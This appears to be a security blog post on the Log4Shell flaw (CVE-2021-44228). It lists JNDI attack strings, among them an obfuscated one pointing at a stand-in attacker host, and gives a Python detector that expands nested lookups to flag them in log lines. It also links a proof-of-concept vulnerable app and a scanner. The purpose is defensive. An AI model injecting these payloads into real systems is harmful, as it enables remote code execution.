
[Urgent] Vulnerability) Apache Log4j 2 Vulnerability (CVE-2021-44228) PoC and Vulnerability Scanner

로픽 2021. 12. 13. 01:19

Apache Log4j 2 Vulnerability (CVE-2021-44228 / Log4Shell) PoC and Vulnerability Scanner

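* Attack string format

- Main attack strings: ${jndi:ldap://xxx.xxx.xxx/z} , ${jndi:rmi://xxx.xxx.xxx/z}
- Inserted into the HTTP URL, headers and body in large numbers of attack attempts (automated attacks using vulnerability scanners such as Zgrab)
- The string can also arrive with mixed upper and lower case, or in obfuscated forms such as the one below.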
ex) ${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//somesitehackerofhell.com/z}
- Source: https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words
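
Added example (not from the original post or the linked projects): a Python check that expands nested lookups such as `${env:ENV_NAME:-j}` before searching a log line for a `jndi:` lookup, so the obfuscated form above is caught as well as the plain one. It also handles `${lower:...}`/`${upper:...}` and percent-encoding, which go beyond the forms shown above; the function names, log format and sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Innermost Log4j lookup: "${...}" whose body contains no further braces.
INNER = re.compile(r"\$\{([^{}]*)\}")
# A lookup that starts with the jndi prefix, in any letter case.
JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)

def resolve(match):
    """Approximate Log4j's expansion of one innermost lookup."""
    body = match.group(1)
    if ":-" in body:                  # ${env:ENV_NAME:-j}: assume default "j"
        return body.split(":-", 1)[1]
    prefix, _, value = body.partition(":")
    if prefix.lower() == "lower":
        return value.lower()
    if prefix.lower() == "upper":
        return value.upper()
    return ""                         # value not knowable from the log line

def contains_jndi_lookup(text):
    """True if text holds a jndi lookup, written plainly or assembled
    from nested lookups."""
    text = unquote(text)              # payload may be percent-encoded
    while True:
        if JNDI.search(text):
            return True
        expanded = INNER.sub(resolve, text)
        if expanded == text:          # nothing left to expand
            return False
        text = expanded               # each pass removes at least one "{"

# Constructed request-log lines (hypothetical format, placeholder hosts).
SAMPLE_LOG = [
    '203.0.113.7 "GET /?q=${jndi:ldap://xxx.xxx.xxx/z} HTTP/1.1" 200 "-"',
    '203.0.113.7 "GET / HTTP/1.1" 200 "${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}'
    '${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//xxx.xxx.xxx/z}"',
    '203.0.113.7 "GET /?q=%24%7BJnDi:rmi://xxx.xxx.xxx/z%7D HTTP/1.1" 200 "-"',
    '198.51.100.9 "GET /docs?tpl=${env:HOME}/index HTTP/1.1" 200 "-"',
    '198.51.100.9 "GET /index.html HTTP/1.1" 200 "-"',
]

def flagged(lines):
    """Indexes of the lines that contain a jndi lookup."""
    return [i for i, line in enumerate(lines) if contains_jndi_lookup(line)]

if __name__ == "__main__":
    print(flagged(SAMPLE_LOG))
```

A plain substring or single-regex match for `${jndi:` misses the second sample line, which is why the lookups are expanded first.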


* Currently shared CVE-2021-44228 PoC

- Provided as a vulnerable application in a Docker image
- Source: https://www.lunasec.io/docs/blog/log4j-zero-day/


* CVE-2021-44228 vulnerability scanner

- Checks whether a vulnerable Log4j2 version is in use on Windows, Linux and Unix environments
- Source: https://github.com/logpresso/CVE-2021-44228-Scanner

